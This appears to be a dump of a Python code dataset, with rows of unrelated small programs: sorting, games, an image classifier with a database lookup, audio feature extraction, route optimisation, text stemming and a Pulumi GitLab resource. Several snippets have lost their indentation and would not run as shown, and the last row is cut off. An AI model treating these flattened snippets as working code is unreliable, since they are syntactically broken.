        for k in range(n - 2, done - 1, -1):
            if a_list[k] > a_list[k + 1]:
                a_list[k], a_list[k + 1] = a_list[k + 1], a_list[k]
                swap_count += 1
    return a_list, swap_count
def main():
    """Read n and n integers from stdin, bubble-sort them, and print the
    sorted sequence followed by the swap count."""
    count = int(input())
    values = [int(tok) for tok in input().split()]
    ordered, swaps = bubble_sort(values, count)
    print(" ".join(str(v) for v in ordered))
    print(swaps)
if __name__ == '__main__':
main() |
2,940 | d4b01b015723950a4d8c3453d736cd64f306d27b | # Game Tebak Angka
# Number-guessing game: the player has 3 attempts to guess a random 0-10 number.
from random import randint

nyawa = 3                      # remaining attempts ("lives")
angka_rahasia = randint(0,10)  # the secret number
limit = 0                      # losing threshold for the attempt counter

print(f"Selamat datang di Game Tebak angka")
while nyawa > limit:
    print(f"Percobaan anda tersisa {nyawa}")
    jawaban = int(input("Masukkan angka 0-10 = "))
    if jawaban == angka_rahasia:
        print ("Anda Benar")   # correct guess -> win
        break
    elif nyawa-1 == limit:
        print ("Anda Gagal")   # that was the last attempt -> lose
        break
    elif jawaban > angka_rahasia:
        print("Lebih")         # hint: guess was too high
        nyawa -= 1
    elif jawaban < angka_rahasia:
        print("Kurang")        # hint: guess was too low
        nyawa -= 1
"""# Game Tebak Angka
from random import randint
# Mengimpor Library Random untuk membuat angka rahasia secara acak
nyawa = 3 # Jumlah percobaan yang di berikan
angka_rahasia = randint(0,10) # Angka rahasia sebagai jawaban game
limit = 0 # Batas nyawa jika nyawa jadi 0 maka pemain akan gagal
print(f"Selamat datang di Game Tebak angka")
while nyawa > limit:
# ini menandakan bahwa game akan berjalan
# jika nyawa lebih besar dari limit
print(f"Percobaan anda tersisa {nyawa}")
# ini untuk memberitahukan pemain jumlah nyawa yang mereka miliki
jawaban = int(input("Masukkan angka 0-10 = "))
# ini untuk menerima angka tebakan dari pemain
if jawaban == angka_rahasia:
print ("Anda Benar")
break
# ini untuk memeriksa apakah angka yang
# di masukan pemain sama dengan angka rahasia
elif nyawa-1 == limit:
print ("Anda Gagal")
break
# Jika jawabannya salah maka nyawanya akan di periksa di sini jika
# nyawanya sudah mencapai limit maka game nya akan selesai
# dan pemain akan kalah
elif jawaban > angka_rahasia:
print("Lebih")
nyawa -= 1
elif jawaban < angka_rahasia:
print("Kurang")
nyawa -= 1
# ini untuk memberikan bantuan kepada pemain apakah angka yang di masukkan
# itu lebih besar atau kurang dari angka rahasia
"""
|
2,941 | 1255a9df2fbe11d92991f3f0f7054b92cb017628 | # -*- coding: utf-8 -*-
"""
Created on Tue Mar 12 20:29:49 2019
@author: kzx789
"""
from PIL import Image
import os, glob, numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import math
import cv2
import pymysql
import MySQLdb as mysql
"""
#csv를 읽어서 영양정보 출력
def get_Nutrition(str) :
nutrition = pd.read_csv('C:/식품영양정보/영양정보.csv')
print(nutrition[nutrition['음식명'] == str])
"""
# Display every test image that was used, in a 4-row grid.
def drawing_plt():
    """Show all images under `caltech_dir` on a single matplotlib figure."""
    thisImg = os.listdir(caltech_dir)
    row = 4
    cols = int(math.ceil(len(thisImg)/4))  # round up so every image gets a cell
    fig = plt.figure()
    i = 1
    for image in glob.glob("C:/cnnTest/*.jpg"):  # collect the test files via glob
        img = cv2.imread(image)
        subplot = fig.add_subplot(row, cols, i)
        subplot.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))  # BGR -> RGB for true colours
        subplot.set_title(thisImg[i-1])  # title each cell with its file name
        subplot.axis("off")
        i += 1
    print('\t',"전체 이미지 리스트 ")
    plt.show()
# Display a single image that matched the prediction threshold.
def get_Image(str):
    """Load `C:/cnnTest/<str>` and display it without axis ticks.

    NOTE(review): the parameter name `str` shadows the builtin.
    """
    imgPath = 'C:/cnnTest/'
    image = cv2.imread(imgPath+str)
    image = cv2.cvtColor(image,cv2.COLOR_BGR2RGB)  # BGR -> RGB for matplotlib
    plt.imshow(image)
    plt.xticks([])
    plt.yticks([])
    plt.show()
# Fetch nutrition facts for a food name from the local MySQL database.
def get_DB_Nutrition(str):
    """Look up *str* in NUTRITION_INFO and print the first row as a Series.

    Fixes:
      * cur.execute(sql, (str)) passed a bare string -- `(str)` is not a
        tuple -- which happens to work in PyMySQL but is not the documented,
        DB-API-portable form; a real one-element tuple is passed now;
      * the connection was leaked if the query raised; it is now closed in
        a finally block.
    NOTE(review): the parameter name `str` shadows the builtin, and
    `LIKE %s` without wildcards behaves like equality -- confirm intent.
    """
    db = pymysql.connect(host="localhost", user = "yeha", password="", db="nutrition")
    try:
        cur = db.cursor()
        sql = "SELECT * FROM NUTRITION_INFO WHERE FOODNAME LIKE '음식명' OR FOODNAME LIKE %s"
        cur.execute(sql, (str,))
        data = cur.fetchall()  # fetch every matching row
        df = pd.Series(data[0], data[1])
        print(df)
    finally:
        db.close()  # close even if the query raises
caltech_dir = "C:/cnnTest"
#테스트할 데이터들을 128*128로 지정
image_w = 128
image_h = 128
pixels = image_h * image_w * 3 #픽셀 지정
X = []
#filenames = []
files = os.listdir(caltech_dir) #하위 디렉터리 파일 리스트 구하기
#print(files) #이미지 목록 확인
for i in range(len(files)):
files[i]=caltech_dir+'/'+ files[i]
#print(files)
for f in files:
img = Image.open(f)
img = img.convert("RGB")
img = img.resize((image_w, image_h))
data = np.asarray(img)
# filenames.append(f)
X.append(data)
X = np.array(X)
#print(X)
#모델 불러오기
from keras.models import load_model
model = load_model("C:/image/train/model/multi_img_classification.model")
prediction = model.predict(X)
#print(prediction)
np.set_printoptions(formatter={'float': lambda x: "{0:0.3f}".format(x)})
print('프로그램을 실행합니다..')
print('\n')
thisImg = os.listdir(caltech_dir)
cnt = 0
for i in prediction:
pre_ans = i.argmax() # 예측 레이블//가장 큰 번째 수
#print(i)
#print(pre_ans)
pre_ans_str = ''
if pre_ans == 0: pre_ans_str = "연어회"
elif pre_ans == 1: pre_ans_str = "쌀국수"
elif pre_ans == 2: pre_ans_str = "샌드위치"
else: pre_ans_str = "새우튀김"
if i[0] >= 0.8 :
get_Image(thisImg[cnt])
print(thisImg[cnt]+" 이미지는 "+pre_ans_str+"(으)로 추정됩니다.")
#get_Nutrition(pre_ans_str)
get_DB_Nutrition(pre_ans_str)
if i[1] >= 0.8:
get_Image(thisImg[cnt])
print(thisImg[cnt]+" 이미지는 "+pre_ans_str+"(으)로 추정됩니다.")
#get_Nutrition(pre_ans_str)
get_DB_Nutrition(pre_ans_str)
if i[2] >= 0.8:
get_Image(thisImg[cnt])
print(thisImg[cnt]+" 이미지는 "+pre_ans_str+"(으)로 추정됩니다.")
#get_Nutrition(pre_ans_str)
get_DB_Nutrition(pre_ans_str)
if i[3] >= 0.8:
get_Image(thisImg[cnt])
print(thisImg[cnt]+" 이미지는 "+pre_ans_str+"(으)로 추정됩니다.")
#get_Nutrition(pre_ans_str)
get_DB_Nutrition(pre_ans_str)
cnt += 1
drawing_plt()
|
2,942 | 051544f41cc3c7d78210076cb9720866924ea2a1 | # Print list of files and directories
import os
def file_list(dir):
    """Recursively print every file under *dir*: files first, then each
    subdirectory's contents, in os.listdir order."""
    entries = [os.path.join(dir, name) for name in os.listdir(dir)]
    pending = []
    for path in entries:
        if os.path.isdir(path):
            pending.append(path)  # recurse into directories after the files
        else:
            print(path)
    for sub in pending:
        file_list(sub)
file_list('D:\Workspace\test\PythonProject')
|
2,943 | 95021cc01c0b85b512fd466797d4d128472773c3 | import shelve
arguments = ["self", "info", "args", "world"]
minlevel = 2
helpstring = "moneyreset"
def main(connection, info, args, world):
    """Reset the sender's money data to the starting state and confirm in channel.

    Opens the per-network shelve (named after the bot's nick on this host),
    overwrites the sender's record with the defaults, then replies.  `args`
    is part of the plugin interface and is unused here.

    Fix: the shelve was synced but never closed, leaking the open database
    file; it is now closed in a finally block.
    """
    money = shelve.open("money-%s.db" % (world.hostnicks[connection.host]), writeback=True)
    try:
        # Default record: starting cash, cap, empty inventory, 50/50 coin-flip deck.
        money[info["sender"]] = {"money":100000, "maxmoney":100000, "items":[], "coinchance":[True for x in range(50)] + [False for x in range(50)]}
        money.sync()
    finally:
        money.close()
    connection.ircsend(info["channel"], "%s: Your money data has been reset." % (info["sender"]))
|
2,944 | 5a0702dd869862ebc27c83d10e0b1f0575de68a7 | import itertools
import numpy
import math
import psycopg2
import podatki
baza = podatki.baza  # shared DB connection from the podatki module
dom = podatki.preberi_lokacijo()  # home location read from podatki
seznam_trgovin =["spar", "mercator", "tus", "hofer", "lidl"]  # known store chains
id_in_opis = podatki.id_izdelka_v_opis()  # product-id -> description rows
seznam_izdelkov = [el[0] for el in id_in_opis] #['cokolada', 'sladoled', ...]
mnozica_izdelkov = set(seznam_izdelkov)
trgovine_z_izdelki = podatki.trgovine_z_izdelki_f() # dict: {'store': ['id1', 'id2'], ...}
seznam_izdelkov_v_kosarici = [el[3] for el in podatki.kosarica]  # product ids in the basket
'''
def zemljevid_trgovin(trgovine):
sez = []
for trgovina in trgovine:
sez.append([trgovina, [])
def kombinacije_trgovin(seznam_izdelkov):
sez_kombinacij = []
for trgovina in trgovine:
kombinacija = []
izdelki = sez_izdelkov
for izdelek in izdelki:
if izdelek in trgovina:
izdelki = izdelki.remove(izdelek)
'''
def kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin, trgovine_z_izdelki):
    """Return the minimal store combinations that cover the whole basket.

    Enumerates every subset of `seznam_trgovin` (via a 0/1 mask product),
    keeps those whose combined product range is a superset of the basket,
    then prunes non-minimal supersets.
    """
    # Every subset of stores, as sets, via a binary mask over the store list.
    generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for el in itertools.product(*[[0,1]]*len(seznam_trgovin)))
    kombinacije = []
    for mnozica_trgovin in generator_kombinacij:
        izdelki_kombinacije = set()
        for trgovina in mnozica_trgovin:
            for izdelek in trgovine_z_izdelki[trgovina]:
                izdelki_kombinacije.add(izdelek)  # union of every product available in this subset
        if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):
            kombinacije.append(mnozica_trgovin)
    # NOTE(review): the two identical pruning passes below remove elements
    # from `kombinacije` while iterating over it, which can skip entries;
    # the pass is duplicated as a workaround.  Building a new list of
    # minimal sets would be safer.
    for kombinacija in kombinacije:
        for kombinacija2 in kombinacije:
            if kombinacija.issubset(kombinacija2) and kombinacija != kombinacija2:
                kombinacije.remove(kombinacija2)
            elif kombinacija2.issubset(kombinacija) and kombinacija != kombinacija2:
                kombinacije.remove(kombinacija)
    for kombinacija in kombinacije:
        for kombinacija2 in kombinacije:
            if kombinacija.issubset(kombinacija2) and kombinacija != kombinacija2:
                kombinacije.remove(kombinacija2)
            elif kombinacija2.issubset(kombinacija) and kombinacija != kombinacija2:
                kombinacije.remove(kombinacija)
    return kombinacije
    return None  # NOTE(review): unreachable dead code
def razdalja(vozlisce1, vozlisce2):
    """Euclidean distance between two (x, y) vertices."""
    dx = vozlisce2[0] - vozlisce1[0]
    dy = vozlisce2[1] - vozlisce1[1]
    return math.sqrt(dy ** 2 + dx ** 2)
#dom = [x,y]
def doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):
    """Pick one concrete location per store type minimising the round trip.

    Enumerates every choice of one location per store in *kombinacija* and
    returns [route, length], where route is [home, loc1, loc2, ...] and
    length is the closed-tour distance home -> loc1 -> ... -> home.
    Prints a message and returns None when no tour can be built.
    `seznam_izdelkov` is kept for interface compatibility (unused, as in
    the original).

    Fixes over the original nested-loop version:
      * `dolzina` was reset only after an append, so later candidates lost
        the legs accumulated for earlier ones and most recorded lengths
        were wrong;
      * combinations were limited to at most five store types -- any
        number is supported now via itertools.product;
      * an unreachable trailing `return` referencing an undefined name was
        removed.
    """
    skupine = [podatki.lokacije(slovar_koordinat, trgovina) for trgovina in kombinacija]
    poti = []
    for izbor in itertools.product(*skupine):
        tocke = [dom] + list(izbor)
        # Closed tour: legs between consecutive stops plus the leg back home.
        dolzina = sum(razdalja(a, b) for a, b in zip(tocke, tocke[1:]))
        dolzina += razdalja(tocke[-1], dom)
        poti.append([tocke, dolzina])
    if not poti:
        print("Nakupa ni mogoče opraviti.")
        return None
    mini = numpy.argmin([el[1] for el in poti])
    return poti[mini]  # [[route vertices], total length]
def doloci_pot(dom, seznam_izdelkov, seznam_trgovin, seznam_izdelkov_v_kosarici, trgovine_z_izdelki):
    """Pick the overall best route across every covering store combination.

    Returns (route_vertices_ending_at_home, visited_store_combination), or
    None when no combination covers the basket.

    NOTE(review): relies on the module-level global `slovar_koordinat`
    rather than a parameter, and assumes doloci_trgovine never returns None
    for the combinations it receives.
    """
    vozlisca = []
    dolzine = []
    trgovine = []
    for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici), seznam_trgovin, trgovine_z_izdelki):
        par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija)
        dolzine.append(par[1])
        vozlisca.append(par[0])
        trgovine.append(kombinacija)
    if dolzine == []:
        return None
    i = numpy.argmin(dolzine)
    v = vozlisca[i]
    v.append(dom)  # close the loop back home for display purposes
    obiskane_trgovine = trgovine[i]
    return v, obiskane_trgovine
def razporeditev(obiskane_trgovine, izdelki, slovar):
    """Assign each basket item to one of the visited stores.

    Returns [[store, [item_description, ...]], ...].

    NOTE(review): the inner loop iterates the full `izdelki` list but
    removes from the copy `izdelki2`, so an item stocked by several visited
    stores is listed under each of them -- and the second `remove` of the
    same id would raise ValueError.  Iterating the shrinking copy was
    probably intended; confirm before relying on this.
    """
    izdelki2 = izdelki.copy()
    razporeditev = []
    for trgovina in obiskane_trgovine:
        sez = []
        for izdelek in izdelki:
            if {izdelek}.issubset(slovar[trgovina]):
                izd = podatki.id_izdelka_v_opis()[izdelek-1]  # look up the item description
                sez.append(izd)
                izdelki2.remove(izdelek)
        razporeditev.append([trgovina, sez])
    return razporeditev
baza.commit()
slovar_koordinat = podatki.slovar_koordinat  # store locations keyed by chain
kombinacije_trgovin = kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici), seznam_trgovin, trgovine_z_izdelki)
#print(kombinacije_trgovin)'
# Compute the best route, then assign each basket item to a visited store.
pot, obiskane_trgovine = doloci_pot(dom, seznam_izdelkov, seznam_trgovin, seznam_izdelkov_v_kosarici, trgovine_z_izdelki)
razpredelnica = razporeditev(obiskane_trgovine, seznam_izdelkov_v_kosarici, podatki.trgovine_z_izdelki)
|
2,945 | 6c88e55a76cbd84cee0ebd6c51d930cc2da100d2 | print("hello world")
print("lol")
print("new changes in vis") |
2,946 | bdbeebab70a6d69e7553807d48e3539b78b48add | # SymBeam examples suit
# ==========================================================================================
# António Carneiro <amcc@fe.up.pt> 2020
# Features: 1. Numeric length
# 2. Pin
# 3. Two rollers
# 4. Numeric distributed constant load
# 5. Numeric distributed quadratic load
import matplotlib.pyplot as plt
from symbeam import beam
# Build a 6-unit beam with mixed supports and two distributed loads,
# solve it symbolically, and save the diagram next to this script.
test_beam = beam(6, x0=0)
test_beam.add_support(0, "roller")
test_beam.add_support(2, "roller")
test_beam.add_support(6, "pin")
test_beam.add_support(4, "hinge")
test_beam.add_distributed_load(0, 4, -5)  # constant load on [0, 4]
test_beam.add_distributed_load(4, 6, "-(-3*(x-5)**2 + 8)")  # quadratic load on [4, 6]
test_beam.solve()
fig, ax = test_beam.plot()
plt.savefig(__file__.split(".py")[0] + ".svg")
|
2,947 | ba808d23f6a8226f40e1c214012a1535ee1e9e98 | import os
import json
import librosa
# Constants
# Dataset used for training
DATASET_PATH = "dataset"
# Where the data is stored
JSON_PATH = "data.json"
# Number of samples considered to preprocess data
SAMPLES_TO_CONSIDER = 22050 # 1 sec worth of sound
# Main function to preprocess the data
def prepare_dataset(dataset_path, json_path, n_mfcc=13, hop_length=512, n_fft=2048):
    """Extract MFCCs for every keyword folder under *dataset_path* into *json_path*.

    The output JSON contains:
      mappings: keyword (sub-folder) names
      labels:   per-file integer label (sub-folder index, 0-based)
      MFCCs:    per-file MFCC matrix as a time-major nested list
      files:    per-file path

    Fixes: the root-folder test used identity (`is not`), which only works
    by accident in CPython, and the category name was extracted by splitting
    on a hard-coded Windows separator; both now use portable os.path calls.
    """
    data = {
        "mappings": [],  # keywords
        "labels": [],    # a value for each audio file in the dataset
        "MFCCs": [],     # MFCC for each audio file
        "files": []      # filenames with path for each audio file
    }

    # Walk the folder tree top-down; each sub-folder is one keyword class.
    for i, (dir_path, dir_names, filenames) in enumerate(os.walk(dataset_path)):
        # Skip the root itself -- only sub-folders carry keyword samples.
        if os.path.abspath(dir_path) != os.path.abspath(dataset_path):
            # Portable: last path component instead of split("\\")[-1].
            category = os.path.basename(dir_path)
            data["mappings"].append(category)
            print(f"Processing {category}")

            for f in filenames:
                file_path = os.path.join(dir_path, f)
                signal, sr = librosa.load(file_path)

                # Keep only clips at least 1 second long, truncated to exactly 1 s.
                if len(signal) >= SAMPLES_TO_CONSIDER:
                    signal = signal[:SAMPLES_TO_CONSIDER]
                    MFCCs = librosa.feature.mfcc(signal, n_mfcc=n_mfcc,
                                                 hop_length=hop_length, n_fft=n_fft)
                    # os.walk yields the root first (index 0), so sub-folder
                    # labels start at i - 1 == 0.
                    data["labels"].append(i - 1)
                    data["MFCCs"].append(MFCCs.T.tolist())
                    data["files"].append(file_path)
                    print(f"{file_path}: {i - 1}")

    with open(json_path, "w") as fp:
        json.dump(data, fp, indent=4)
if __name__ == "__main__":
prepare_dataset(DATASET_PATH, JSON_PATH)
|
2,948 | 1593280a29b13461b13d8b2805d9ac53ce94c759 |
import turtle
import random
import winsound
import sys
""" new_game = False
def toggle_new_game():
global new_game
if new_game == False:
new_game = True
else:
new_game = False """
# Main window showing the title screen until the game loop redraws it.
wn = turtle.Screen()
wn.title("MaskUp")
wn.bgcolor("green")
wn.bgpic("retro_city_title_page.gif")
wn.setup(width=800, height=600)
wn.tracer(0)  # manual frame updates via wn.update() for smooth animation
wn.register_shape("human.gif")
def game_loop():
    """Run one game session until the player runs out of lives.

    Uses the module-level screen `wn`; creates the player sprite, falling
    masks (good guys, +10 points) and viruses (bad guys, -10 points and a
    life), then animates them in a busy loop with manual wn.update() calls.
    """
    score = 0
    lives = 3
    wn.register_shape("human.gif")
    wn.register_shape("Evil-Virus.gif")
    wn.register_shape("surgical-mask.gif")
    # Add the player
    player = turtle.Turtle()
    player.speed(0)
    player.shape("human.gif")
    player.color("white")
    player.penup()
    player.goto(0, -250)
    player.direction = "stop"  # movement state driven by the key bindings below
    # Create a list of good guys
    good_guys = []
    # Add the good_guys
    for _ in range(3):
        good_guy = turtle.Turtle()
        good_guy.speed(0)
        good_guy.shape("surgical-mask.gif")
        good_guy.color("blue")
        good_guy.penup()
        good_guy.goto(-100, 250)
        # NOTE(review): rebinds the turtle's speed() method to a float; this
        # works because the code only READS .speed afterwards (fall speed).
        good_guy.speed = random.uniform(0.3, 2.0)
        good_guys.append(good_guy)
    # Create a list of bad guys
    bad_guys = []
    # Add the bad_guys
    for _ in range(5):
        bad_guy = turtle.Turtle()
        bad_guy.speed(0)
        bad_guy.shape("Evil-Virus.gif")
        bad_guy.color("red")
        bad_guy.penup()
        bad_guy.goto(100, 250)
        bad_guy.speed = random.uniform(0.3, 1.0)
        bad_guys.append(bad_guy)
    # Make the pen (score/lives display at the top of the window)
    pen = turtle.Turtle()
    pen.hideturtle()
    pen.speed(0)
    pen.shape("square")
    pen.color("white")
    pen.penup()
    pen.goto(0, 260)
    font = ("Courier", 24, "normal")
    pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font)
    # Make the game-over message
    def show_message(score):
        message = turtle.Turtle()
        message.hideturtle()
        message.speed(0)
        message.color("yellow")
        message.penup()
        message.goto(0, 0)
        font = ("Calibri", 24, "bold")
        message.write("GAME OVER: TOO MUCH EXPOSURE TO VIRUS\n Score: {}\n!MASK UP and STAY SAFE!".format(score), align="center", font=font)
    # Movement-state setters bound to the arrow keys below
    def go_left():
        player.direction = "left"
    def go_right():
        player.direction = "right"
    def stop_player():
        player.direction = "stop"
    # Keyboard Binding
    wn.listen()
    wn.onkeypress(go_left, "Left")
    wn.onkeyrelease(stop_player, "Left")
    wn.onkeypress(go_right, "Right")
    wn.onkeyrelease(stop_player, "Right")
    while True:
        # Update screen
        wn.update()
        # Move the player (clamped to the window edges)
        if player.direction == "left":
            x = player.xcor()
            if x > -365:
                x -= 0.8
                player.setx(x)
        if player.direction == "right":
            x = player.xcor()
            if x < 365:
                x += 0.8
                player.setx(x)
        # Move the good guys
        for good_guy in good_guys:
            y = good_guy.ycor()
            y -= good_guy.speed
            good_guy.sety(y)
            # Check if off the screen; respawn at a random top position
            if y < -300:
                x = random.randint(-380, 380)
                y = random.randint(300, 400)
                good_guy.goto(x, y)
            # Check for a collision with player: +10 points and respawn
            if good_guy.distance(player) < 40:
                x = random.randint(-380, 380)
                y = random.randint(300, 400)
                good_guy.goto(x, y)
                score += 10
                pen.clear()
                pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font)
                winsound.PlaySound("video_game_retro_8bit_coin", winsound.SND_FILENAME)
        # Move the bad guys
        for bad_guy in bad_guys:
            y = bad_guy.ycor()
            y -= bad_guy.speed
            bad_guy.sety(y)
            # Check if off the screen
            if y < -300:
                x = random.randint(-380, 380)
                y = random.randint(300, 400)
                bad_guy.goto(x, y)
            # Check for a collision with player: lose 10 points and one life
            if bad_guy.distance(player) < 40:
                x = random.randint(-380, 380)
                y = random.randint(300, 400)
                bad_guy.goto(x, y)
                score -= 10
                lives -= 1
                pen.clear()
                pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font)
                winsound.PlaySound("arcade_game_alarm_short", winsound.SND_FILENAME)
                if lives <= 0:
                    pen.clear()
                    bad_guy.clear()
                    good_guy.clear()
                    show_message(score)
                    winsound.PlaySound("game_over_sound", winsound.SND_FILENAME)
                    # wn.listen()
                    # if wn.onkeypress(toggle_new_game, "a"):
                    #     if new_game == True:
                    break
# wn.onkeypress(sys.exit(), "q")
while True:
    # Update screen
    wn.update()
    # Play music (looped), swap to the in-game backdrop and run one session
    wn.bgpic("retro_city.gif")
    winsound.PlaySound("retro_video_game_music-trimmed", winsound.SND_LOOP)
    game_loop()
    # Session over: rebuild the window so the next game starts clean
    turtle.Screen().clear()
    wn = turtle.Screen()
    wn.title("MaskUp")
    wn.bgcolor("green")
    wn.bgpic("retro_city_title_page.gif")
    wn.setup(width=800, height=600)
    wn.tracer(0)
#sys.exit()
wn.mainloop()  # NOTE(review): unreachable -- the loop above never exits
2,949 | 1f1677687ba6ca47b18728b0fd3b9926436e9796 | #Voir paragraphe "3.6 Normalizing Text", page 107 de NLP with Python
from nltk.stem.snowball import SnowballStemmer
from nltk.stem.wordnet import WordNetLemmatizer
# Stopwords should be removed before stemming.
stemmer = SnowballStemmer("english", ignore_stopwords=True)
lemmatizer = WordNetLemmatizer()

# Sample vocabulary: inflected verbs, plurals, irregular nouns, derived words.
source = ["having", "have", "needs", "need", "inflation", "inflate", "developments", "developing", "aggregation",
          "aggregated", "population", "poverty", "poor", "poorer", "men", "man", "gases", "gas", "sues", "utilized",
          "damaged"]

stems1 = [stemmer.stem(word) for word in source]           # stem only
stems2 = [lemmatizer.lemmatize(word) for word in source]   # lemmatize only
stems3 = [stemmer.stem(word) for word in stems2]           # lemmatize, then stem

print(stems1)
print(stems2)
print(stems3)
|
2,950 | aa79d5cbe656979bf9c228f6a576f2bbf7e405ca | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['UserGpgKeyArgs', 'UserGpgKey']
@pulumi.input_type
class UserGpgKeyArgs:
def __init__(__self__, *,
key: pulumi.Input[str],
user_id: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a UserGpgKey resource.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
pulumi.set(__self__, "key", key)
if user_id is not None:
pulumi.set(__self__, "user_id", user_id)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
The armored GPG public key.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="userId")
def user_id(self) -> Optional[pulumi.Input[int]]:
"""
The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
return pulumi.get(self, "user_id")
@user_id.setter
def user_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "user_id", value)
@pulumi.input_type
class _UserGpgKeyState:
def __init__(__self__, *,
created_at: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
key_id: Optional[pulumi.Input[int]] = None,
user_id: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering UserGpgKey resources.
:param pulumi.Input[str] created_at: The time when this key was created in GitLab.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] key_id: The ID of the GPG key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
if created_at is not None:
pulumi.set(__self__, "created_at", created_at)
if key is not None:
pulumi.set(__self__, "key", key)
if key_id is not None:
pulumi.set(__self__, "key_id", key_id)
if user_id is not None:
pulumi.set(__self__, "user_id", user_id)
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> Optional[pulumi.Input[str]]:
"""
The time when this key was created in GitLab.
"""
return pulumi.get(self, "created_at")
@created_at.setter
def created_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "created_at", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
The armored GPG public key.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="keyId")
def key_id(self) -> Optional[pulumi.Input[int]]:
"""
The ID of the GPG key.
"""
return pulumi.get(self, "key_id")
@key_id.setter
def key_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "key_id", value)
@property
@pulumi.getter(name="userId")
def user_id(self) -> Optional[pulumi.Input[int]]:
"""
The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
return pulumi.get(self, "user_id")
@user_id.setter
def user_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "user_id", value)
class UserGpgKey(pulumi.CustomResource):
    # NOTE(review): layout matches Pulumi's code generator (typed @overload
    # __init__s dispatching to _internal_init) — this class appears to be
    # auto-generated; prefer regenerating the SDK over hand-editing it.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 key: Optional[pulumi.Input[str]] = None,
                 user_id: Optional[pulumi.Input[int]] = None,
                 __props__=None):
        """
        The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.
        > Managing GPG keys for arbitrary users requires admin privileges.
        **Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)
        ## Example Usage
        ```python
        import pulumi
        import pulumi_gitlab as gitlab
        example_user = gitlab.get_user(username="example-user")
        # Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.
        example_user_gpg_key = gitlab.UserGpgKey("exampleUserGpgKey",
            user_id=example_user.id,
            key=\"\"\"-----BEGIN PGP PUBLIC KEY BLOCK-----
        ...
        -----END PGP PUBLIC KEY BLOCK-----\"\"\")
        # Manages a GPG key for the current user
        example_user_user_gpg_key = gitlab.UserGpgKey("exampleUserUserGpgKey", key=\"\"\"-----BEGIN PGP PUBLIC KEY BLOCK-----
        ...
        -----END PGP PUBLIC KEY BLOCK-----\"\"\")
        ```
        ## Import
        You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.
        ```sh
         $ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1
        ```
        Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.
        ```sh
         $ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] key: The armored GPG public key.
        :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: UserGpgKeyArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.
        > Managing GPG keys for arbitrary users requires admin privileges.
        **Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)
        ## Example Usage
        ```python
        import pulumi
        import pulumi_gitlab as gitlab
        example_user = gitlab.get_user(username="example-user")
        # Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.
        example_user_gpg_key = gitlab.UserGpgKey("exampleUserGpgKey",
            user_id=example_user.id,
            key=\"\"\"-----BEGIN PGP PUBLIC KEY BLOCK-----
        ...
        -----END PGP PUBLIC KEY BLOCK-----\"\"\")
        # Manages a GPG key for the current user
        example_user_user_gpg_key = gitlab.UserGpgKey("exampleUserUserGpgKey", key=\"\"\"-----BEGIN PGP PUBLIC KEY BLOCK-----
